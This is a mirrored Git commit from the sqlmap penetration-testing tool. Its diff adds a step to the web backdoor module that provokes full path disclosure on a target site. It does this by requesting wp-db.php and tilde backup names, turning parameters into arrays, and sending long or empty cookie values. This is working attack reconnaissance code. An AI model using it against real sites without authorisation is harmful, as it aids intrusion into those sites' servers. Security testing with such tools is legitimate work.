mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-23 07:59:04 +00:00
Implementation for an Issue #1895
This commit is contained in:
@@ -26,6 +26,7 @@ from lib.core.common import ntToPosixSlashes
|
||||
from lib.core.common import isTechniqueAvailable
|
||||
from lib.core.common import isWindowsDriveLetterPath
|
||||
from lib.core.common import normalizePath
|
||||
from lib.core.common import parseFilePaths
|
||||
from lib.core.common import posixToNtSlashes
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import randomStr
|
||||
@@ -38,8 +39,10 @@ from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import OS
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.enums import WEB_API
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
|
||||
@@ -196,6 +199,60 @@ class Web:
|
||||
self.webApi = choices[int(choice) - 1]
|
||||
break
|
||||
|
||||
if not kb.absFilePaths:
|
||||
message = "do you want sqlmap to further try to "
|
||||
message += "provoke the full path disclosure? [Y/n] "
|
||||
getOutput = readInput(message, default="Y")
|
||||
|
||||
if getOutput in ("y", "Y"):
|
||||
headers = {}
|
||||
been = {conf.url}
|
||||
|
||||
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
|
||||
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
|
||||
if url not in been:
|
||||
try:
|
||||
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
|
||||
parseFilePaths(page)
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
been.add(url)
|
||||
|
||||
url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
|
||||
if url not in been:
|
||||
try:
|
||||
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
|
||||
parseFilePaths(page)
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
been.add(url)
|
||||
|
||||
for place in (PLACE.GET, PLACE.POST):
|
||||
if place in conf.parameters:
|
||||
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
|
||||
if "[]" in value:
|
||||
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
cookie = None
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
cookie = conf.parameters[PLACE.COOKIE]
|
||||
elif headers and HTTP_HEADER.SET_COOKIE in headers:
|
||||
cookie = headers[HTTP_HEADER.SET_COOKIE]
|
||||
|
||||
if cookie:
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
directories = list(arrayizeValue(getManualDirectories()))
|
||||
directories.extend(getAutoDirectories())
|
||||
directories = list(oset(directories))
|
||||
|
||||
Reference in New Issue
Block a user